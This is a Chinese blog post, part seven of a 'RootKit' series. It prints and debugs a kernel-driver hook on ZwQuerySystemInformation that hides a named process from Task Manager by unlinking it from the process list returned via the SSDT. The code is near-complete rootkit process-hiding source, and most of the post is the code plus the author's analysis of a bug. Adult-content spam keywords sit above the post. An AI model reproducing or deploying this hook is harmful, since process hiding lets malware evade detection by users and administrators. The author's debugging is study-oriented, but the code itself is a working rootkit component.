激情另类综合,国产日产欧产精品推荐色 ,狠狠色狠狠色综合系列

HOOK SSDT Hide Process （七）

Posted on 2009-10-27 17:32 S.l.e!ep.￠% 閱讀(328) 評論(0) 編輯收藏引用所屬分類: RootKit

[資料] http://www.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

繼 HOOK SSDT Hide Process （六）??

下面這個函數有問題，運行之后，Taskmgr.exe 里面的進程列表估然顯示為空

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)? // 定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString( & process_name,?L " taskmgr.exe " );
????
????rc? = ?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
???? if (NT_SUCCESS(rc))?
????{
????????
???????? if ( 5 ? == ?SystemInformationClass)
????????{?
????????????
???????????? struct ?_SYSTEM_PROCESSES? * curr? = ?( struct ?_SYSTEM_PROCESSES? * )SystemInformation;?
???????????? struct ?_SYSTEM_PROCESSES? * prev? = ?NULL;?
????????????
???????????? if (curr -> NextEntryDelta)
????????????????curr? = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);?
????????????
???????????? while (curr)
????????????{
???????????????? if ?(RtlEqualUnicodeString( & process_name,? & curr -> ProcessName,? 1 ))
????????????????{
????????????????????KdPrint(( " hide?process'name?taskmgr.exe " ));
????????????????????
???????????????????? if (prev)?
????????????????????{?
???????????????????????? if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????prev -> NextEntryDelta? += ?curr -> NextEntryDelta;
????????????????????????}?
???????????????????????? else
????????????????????????{
????????????????????????????prev -> NextEntryDelta? = ? 0 ;
????????????????????????}
????????????????????}
???????????????????? else
????????????????????{
???????????????????????? if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????SystemInformation? = (PVOID)((ULONG)SystemInformation? + ?curr -> NextEntryDelta);
????????????????????????}
???????????????????????? else
????????????????????????{
????????????????????????????SystemInformation? = ?NULL;
????????????????????????}
????????????????????}
????????????????????
???????????????????? if (curr -> NextEntryDelta)
????????????????????????curr? = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
???????????????????? else
????????????????????{
????????????????????????curr? = ?NULL;
???????????????????????? break ;
????????????????????}
????????????????????
????????????????}? // ?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????
???????????????? if (curr? != ?NULL)
????????????????{
????????????????????prev? = ?curr;
????????????????????
???????????????????? if (curr -> NextEntryDelta)
????????????????????????curr? = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
???????????????????? else
????????????????????????curr? = ?NULL;
????????????????????
????????????????} // ?if(curr?!=?NULL)
????????????????
????????????} // ?while(curr)?
????????????
????????} // ?if(5?==?SystemInformationClass)
????????
????} // ?if(NT_SUCCESS(rc))
????
???? // ?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully

.?\n"));
???? return ?rc;
}

使用自己的查詢進程EXE(HOOK SSDT Hide Process （五） )，顯示結果是正常的

驅動中判斷的是 taskmgr.exe?，在遍歷時，taskmgr.exe 剛好在最好一個，把 NextEntryDelta 設置為 0 了
如果是其它的 abc.exe ，然后再打開 taskmgr.exe 是沒問題的

看來，HOOK SSDT Hide Process （五）遍歷進程的實現跟 Taskmgr.exe 的實現有差異, 需要再找時間看下原因

從 MyZwQuerySystemInformation() 的實現來看，只是簡單地修改了下 NextEntryDelta ，并非真正意義上的'隱藏'
還是會把數據傳給用戶態。

只有注冊用戶登錄后才能發表評論。
【推薦】100%開源！大型工業跨平臺軟件C++源碼提供，建模，組態！

相關文章: Load Driver protect_pwd.txt Windows下Hook API技術 inline hook 對付API-splicing的一種簡單方法修改IAT實現API HOOK API-HOOK and ANTI-API-HOOK For Ring3 API Hook jmp 法 DirectX Input 鍵盤實現收藏一個反鍵盤記錄工具的分析不用hook 實現掛機鎖

網站導航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

S.l.e!ep.￠%

HOOK SSDT Hide Process （七）

日歷

公告

常用鏈接

留言簿(5)

隨筆分類(1107)

隨筆檔案(1098)

文章檔案(1)

相冊

收藏夾(3)

DataStruct

搜索

積分與排名

最新評論

閱讀排行榜

評論排行榜